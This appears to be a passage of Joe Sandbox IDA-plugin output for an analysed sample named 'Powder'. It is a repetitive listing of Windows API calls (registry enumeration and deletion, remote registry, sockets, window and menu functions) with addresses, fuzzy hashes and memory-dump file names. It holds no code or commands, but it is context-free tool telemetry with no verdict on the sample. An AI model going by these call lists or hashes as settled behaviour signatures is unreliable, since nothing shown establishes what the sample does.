                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                  • String ID: 0
                                                  • API String ID: 3866635326-4108050209
                                                  • Opcode ID: 6765c0ffa1b98dbc3a26f97105793c60ca59826536eb65f6982b0e8e3ba6ae76
                                                  • Instruction ID: 6bf1879cb5e29f0ca9dc6374bc1ad173e6f1fc71149bf2fc970b380e76f5f150
                                                  • Opcode Fuzzy Hash: 6765c0ffa1b98dbc3a26f97105793c60ca59826536eb65f6982b0e8e3ba6ae76
                                                  • Instruction Fuzzy Hash: 87414871A04208EFDB20EF54D884E9ABBF5FB45314F15912AE99DA7250C731ED54CFA0
                                                  APIs
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00E81631
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E8165B
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00E81712
                                                    • Part of subcall function 00E81602: RegCloseKey.ADVAPI32(?), ref: 00E81678
                                                    • Part of subcall function 00E81602: FreeLibrary.KERNEL32(?), ref: 00E816CA
                                                    • Part of subcall function 00E81602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00E816ED
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E816B5
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                  • String ID:
                                                  • API String ID: 395352322-0
                                                  • Opcode ID: 3c2737304bdc7866fe8e0526ad638e6c764719bcc8044fe1c1e211d2229e23a9
                                                  • Instruction ID: 3ad4ebc9da260e9f2801bd76a2455a616d89e56e86e9d59ca0a08d5e97ff287e
                                                  • Opcode Fuzzy Hash: 3c2737304bdc7866fe8e0526ad638e6c764719bcc8044fe1c1e211d2229e23a9
                                                  • Instruction Fuzzy Hash: 87315EB1901109BFDB149F91DC85EFEB7BCEF09304F4011ABE519B2140EB719E4A9BA0
                                                  APIs
                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00E86911
                                                  • GetWindowLongW.USER32(017A5348,000000F0), ref: 00E86944
                                                  • GetWindowLongW.USER32(017A5348,000000F0), ref: 00E86979
                                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00E869AB
                                                  • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00E869D5
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00E869E6
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E86A00
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: LongWindow$MessageSend
                                                  • String ID:
                                                  • API String ID: 2178440468-0
                                                  • Opcode ID: 2c2fbbdaa7c8da0747c042a0ea0335a46ac23020749070953a7c5881706e9fc5
                                                  • Instruction ID: 9afd853b86353ec16504514f8107027ae85364c6291a6a8e62fb981d70aafeb7
                                                  • Opcode Fuzzy Hash: 2c2fbbdaa7c8da0747c042a0ea0335a46ac23020749070953a7c5881706e9fc5
                                                  • Instruction Fuzzy Hash: 91313571604160AFDB21DF59DC88F6437E5EB89318F1921A5FA58AF2F2CB72AC44CB41
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5E2CA
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5E2F0
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00E5E2F3
                                                  • SysAllocString.OLEAUT32(?), ref: 00E5E311
                                                  • SysFreeString.OLEAUT32(?), ref: 00E5E31A
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00E5E33F
                                                  • SysAllocString.OLEAUT32(?), ref: 00E5E34D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: 41d8e807499cb53db90882ca9dc359bf5c2bb8c39fa428705e0ff1403da18f7f
                                                  • Instruction ID: ff8ecea15d1250efda78aecd21f81b9c633d751edc007d1cccbb523cd640ae7b
                                                  • Opcode Fuzzy Hash: 41d8e807499cb53db90882ca9dc359bf5c2bb8c39fa428705e0ff1403da18f7f
                                                  • Instruction Fuzzy Hash: 5921B276600219BF9F14DFA9DC88CBB73ACEB08364B448526FE54EB350D670AD498760
                                                  APIs
                                                    • Part of subcall function 00E78475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E784A0
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00E768B1
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00E768C0
                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E768F9
                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00E76902
                                                  • WSAGetLastError.WSOCK32 ref: 00E7690C
                                                  • closesocket.WSOCK32(00000000), ref: 00E76935
                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00E7694E
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 910771015-0
                                                  • Opcode ID: c1c00bd64e21644c82704d73d75bc69786116991d72ef47b321f99c92bae870f
                                                  • Instruction ID: 58d024caba97f726f04037c5bd98e066db8c5de03f24c3b1e22dbe0917c69b08
                                                  • Opcode Fuzzy Hash: c1c00bd64e21644c82704d73d75bc69786116991d72ef47b321f99c92bae870f
                                                  • Instruction Fuzzy Hash: 6231C471200604AFDB14AF64CC85BBE77A9EB44729F04801AFD09B72D1CB70AD448BA1
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5E3A5
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E5E3CB
                                                  • SysAllocString.OLEAUT32(00000000), ref: 00E5E3CE
                                                  • SysAllocString.OLEAUT32 ref: 00E5E3EF
                                                  • SysFreeString.OLEAUT32 ref: 00E5E3F8
                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00E5E412
                                                  • SysAllocString.OLEAUT32(?), ref: 00E5E420
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                  • String ID:
                                                  • API String ID: 3761583154-0
                                                  • Opcode ID: b4b47014288a91bd9df176fc64bdaf63a4acbcacbe12f4be3a429a75dbe004e0
                                                  • Instruction ID: a9860d4aeae75643a7e98ab0d9c5c7fe0e343b3a6b6d43949d3d057cfd07e451
                                                  • Opcode Fuzzy Hash: b4b47014288a91bd9df176fc64bdaf63a4acbcacbe12f4be3a429a75dbe004e0
                                                  • Instruction Fuzzy Hash: B421CB32605104AFAB149FB9DC88CBF77ECEB08361B408566FD15EB360D670ED458764
                                                  APIs
                                                    • Part of subcall function 00E02111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E0214F
                                                    • Part of subcall function 00E02111: GetStockObject.GDI32(00000011), ref: 00E02163
                                                    • Part of subcall function 00E02111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E0216D
                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E87C57
                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E87C64
                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E87C6F
                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E87C7E
                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E87C8A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                  • String ID: Msctls_Progress32
                                                  • API String ID: 1025951953-3636473452
                                                  • Opcode ID: f8acb2c5284a30bf29d3b98b1be4a613526acfdf0d71f01baa8b8ba6c21ead5f
                                                  • Instruction ID: 1cf22947cf69d4c4ffd7ea392d1dcc29e9ef1500b41b3d9f37ac800dc601b7fa
                                                  • Opcode Fuzzy Hash: f8acb2c5284a30bf29d3b98b1be4a613526acfdf0d71f01baa8b8ba6c21ead5f
                                                  • Instruction Fuzzy Hash: 841190B2140219BEEF159F61CC85EE7BF5DEF08798F115115BB48B2090CB729C21DBA0
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E24282,?), ref: 00E241D3
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00E241DA
                                                  • EncodePointer.KERNEL32(00000000), ref: 00E241E6
                                                  • DecodePointer.KERNEL32(00000001,00E24282,?), ref: 00E24203
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                  • String ID: RoInitialize$combase.dll
                                                  • API String ID: 3489934621-340411864
                                                  • Opcode ID: 375e317b2c79c725f0ed3c0923fab2bca40dcdbb2411282f7be70c3c8a01a511
                                                  • Instruction ID: 5b7cef0af690109c7758bb6f2bc0830ae7e782ef5cefd04c6ab14456fb376dd8
                                                  • Opcode Fuzzy Hash: 375e317b2c79c725f0ed3c0923fab2bca40dcdbb2411282f7be70c3c8a01a511
                                                  • Instruction Fuzzy Hash: 8FE01A72692B11AFDF115F73EC4DF883664AB12B0AFA05426B481F50F0CBB6608E8F00
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E241A8), ref: 00E242A8
                                                  • GetProcAddress.KERNEL32(00000000), ref: 00E242AF
                                                  • EncodePointer.KERNEL32(00000000), ref: 00E242BA
                                                  • DecodePointer.KERNEL32(00E241A8), ref: 00E242D5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                  • String ID: RoUninitialize$combase.dll
                                                  • API String ID: 3489934621-2819208100
                                                  • Opcode ID: 9455253360ce42cf75a4ddc4b656ccf51785bba22db195b23a3fe6fa1fb56455
                                                  • Instruction ID: 2ecedd02d5716510ba476b45cc06ca835c657adb0458ef1c5197a4dee6f66704
                                                  • Opcode Fuzzy Hash: 9455253360ce42cf75a4ddc4b656ccf51785bba22db195b23a3fe6fa1fb56455
                                                  • Instruction Fuzzy Hash: 04E0B6B2552B00EFDB119B63ED0DF443AA4BB00B06FA41126F001F50F0CBF6668DCA10
                                                  APIs
                                                  • GetClientRect.USER32(?,?), ref: 00E021B8
                                                  • GetWindowRect.USER32(?,?), ref: 00E021F9
                                                  • ScreenToClient.USER32(?,?), ref: 00E02221
                                                  • GetClientRect.USER32(?,?), ref: 00E02350
                                                  • GetWindowRect.USER32(?,?), ref: 00E02369
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Rect$Client$Window$Screen
                                                  • String ID:
                                                  • API String ID: 1296646539-0
                                                  • Opcode ID: 0aad28aee7c5d73adb1b33efd0cfd0e14dc5ae5903dd9ed08f1774994a99df94
                                                  • Instruction ID: 6a3e19989f3de53a6586d94f9e6d31242184c2f5b05fbfbd23b0b49895673b6e
                                                  • Opcode Fuzzy Hash: 0aad28aee7c5d73adb1b33efd0cfd0e14dc5ae5903dd9ed08f1774994a99df94
                                                  • Instruction Fuzzy Hash: DAB16E3990024ADBDF10CFA9C9887EDB7F1FF04314F14A129EE59AB255DB34A990CB54
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _memmove$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 3253778849-0
                                                  • Opcode ID: 91b22efea5fb5511936fcdc1f4d591dd095d5c323522926b26b0e4f33ee0f7a3
                                                  • Instruction ID: d4c4937ca34b43bf3a5942764344d736ccfcb8ddce17decd5a6b6076d82cc5bd
                                                  • Opcode Fuzzy Hash: 91b22efea5fb5511936fcdc1f4d591dd095d5c323522926b26b0e4f33ee0f7a3
                                                  • Instruction Fuzzy Hash: 1461BBB121069AABCF11EF60D882EFE77A8AF05388F046558F9557B2D2DB309D45CB50
                                                  APIs
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                    • Part of subcall function 00E8147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E8040D,?,?), ref: 00E81491
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E8091D
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E8095D
                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00E80980
                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E809A9
                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E809EC
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E809F9
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                  • String ID:
                                                  • API String ID: 4046560759-0
                                                  • Opcode ID: 1e1b30f8992ceb0d114c7f00f9e64eb083ffb270074b7bae250447669b0ce510
                                                  • Instruction ID: 7e27b1b407a1d686ecedcf7491249994fc75cd880ca5fc044cb920551a0fb738
                                                  • Opcode Fuzzy Hash: 1e1b30f8992ceb0d114c7f00f9e64eb083ffb270074b7bae250447669b0ce510
                                                  • Instruction Fuzzy Hash: E0518C71208200AFD714EF64C885EAFBBE9FF84314F04591DF599A72A2DB31E949CB52
                                                  APIs
                                                  • GetMenu.USER32(?), ref: 00E85E38
                                                  • GetMenuItemCount.USER32(00000000), ref: 00E85E6F
                                                  • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00E85E97
                                                  • GetMenuItemID.USER32(?,?), ref: 00E85F06
                                                  • GetSubMenu.USER32(?,?), ref: 00E85F14
                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 00E85F65
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountMessagePostString
                                                  • String ID:
                                                  • API String ID: 650687236-0
                                                  • Opcode ID: 3f961243c482fa4ca93be566b48f3ae72b79760df3f375fe81f6fcec98cb03c0
                                                  • Instruction ID: 267030692274691fe7071cde4610fcd751efc8353e129e65f25d00d5fd63ef96
                                                  • Opcode Fuzzy Hash: 3f961243c482fa4ca93be566b48f3ae72b79760df3f375fe81f6fcec98cb03c0
                                                  • Instruction Fuzzy Hash: 95517F76A01A25AFCB11EF64C945AAEB7F5EF48310F10505AF919BB391CB30AE41CB91
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00E5F6A2
                                                  • VariantClear.OLEAUT32(00000013), ref: 00E5F714
                                                  • VariantClear.OLEAUT32(00000000), ref: 00E5F76F
                                                  • _memmove.LIBCMT ref: 00E5F799
                                                  • VariantClear.OLEAUT32(?), ref: 00E5F7E6
                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E5F814
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                  • String ID:
                                                  • API String ID: 1101466143-0
                                                  • Opcode ID: 914caf18a3997c2111fb76cdfa643d1bf7d2f22b2a8326beeae1b67fded3d387
                                                  • Instruction ID: c3d1666153a1e0b2f7a3b9857833bd1eca5b8517309aa7a7be6fce740b849439
                                                  • Opcode Fuzzy Hash: 914caf18a3997c2111fb76cdfa643d1bf7d2f22b2a8326beeae1b67fded3d387
                                                  • Instruction Fuzzy Hash: 8C514CB5A00209EFDB14CF58C894AAAB7B8FF4C354B15856AED59EB300D730E955CFA0
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E629FF
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E62A4A
                                                  • IsMenu.USER32(00000000), ref: 00E62A6A
                                                  • CreatePopupMenu.USER32 ref: 00E62A9E
                                                  • GetMenuItemCount.USER32(000000FF), ref: 00E62AFC
                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00E62B2D
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                  • String ID:
                                                  • API String ID: 3311875123-0
                                                  • Opcode ID: 5e06af9bb63d0f05adc06f804c152603d8f2c14e55f86a5b6fb77cbafa0a9858
                                                  • Instruction ID: 33b7442a51ae201b0795d779299f8492cc2cbc9289eff0a926402cfab56d1ada
                                                  • Opcode Fuzzy Hash: 5e06af9bb63d0f05adc06f804c152603d8f2c14e55f86a5b6fb77cbafa0a9858
                                                  • Instruction Fuzzy Hash: 4351B170A40B09DFCF25CFA8E888AAEBBF4EF44398F14511EE911B7291D7B09944CB51
                                                  APIs
                                                    • Part of subcall function 00E029E2: GetWindowLongW.USER32(?,000000EB), ref: 00E029F3
                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E01B76
                                                  • GetWindowRect.USER32(?,?), ref: 00E01BDA
                                                  • ScreenToClient.USER32(?,?), ref: 00E01BF7
                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E01C08
                                                  • EndPaint.USER32(?,?), ref: 00E01C52
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                  • String ID:
                                                  • API String ID: 1827037458-0
